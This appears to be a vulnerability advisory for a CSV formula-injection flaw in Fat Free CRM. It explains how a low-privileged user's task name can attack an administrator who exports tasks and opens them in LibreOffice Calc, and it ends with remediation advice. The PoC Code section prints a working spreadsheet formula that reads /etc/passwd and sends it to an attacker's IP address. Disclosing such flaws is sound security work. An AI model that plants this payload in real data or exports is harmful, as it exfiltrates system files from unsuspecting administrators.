WS-2021-0202

Overview

In Fat Free CRM, v0.11.4 to v0.19.2 and v0.10.1-rc1 to 0.10.1-rc3, an attacker can register and create a new task with malicious CSV commands. When the data is extorted by the user, in CSV format - there is no check on the name field of the task which can lead to the execution of arbitrary commands on the system.

Details

In Fat Free CRM an attacker can register and create a new task with malicious CSV commands. After that, when the administrator exports the data in CSV format, there is no check on the name field of the task which can lead to the execution of arbitrary commands on the system.

PoC Details

For demonstration purposes we'll use 2 users - test-user1 (low privileged user) and ben (administrator). Login with Username “test-user1”. Create a new Task with the below payload in the name field. Note: modify the IP address accordingly.
Enter the below payload.
Login with Username “ben”. Go to Tasks and see that the task created by the previous user which contains the payload is visible here. Then export all the Tasks in a CSV format. Create a simple http server to get the request and exfiltrated data attached with the request. Administrator opens the exported data in LibreOffice Calc and confirms all the dialog boxes. Then he clicks on the malicious link created by the payload injected. Then the data exfiltrated can be seen in the server logs attached with the respective GET Request

PoC Code

=HYPERLINK(CONCATENATE("http://192.168.18.40:8080/123.txt?v="; ('file:///etc/passwd'#$passwd.A1)); "test-poc")

Affected Environments

v0.11.4 to v0.19.2 and v0.10.1-rc1 to 0.10.1-rc3

Remediation

To Remediate it, ensure that no cells begin with any of the following characters:
Equals to (“=”),
Plus (“+”),
Minus (“-“),
At (“@”),
Tab (0x09),
Carriage return (0x0D).

Prevention

No fix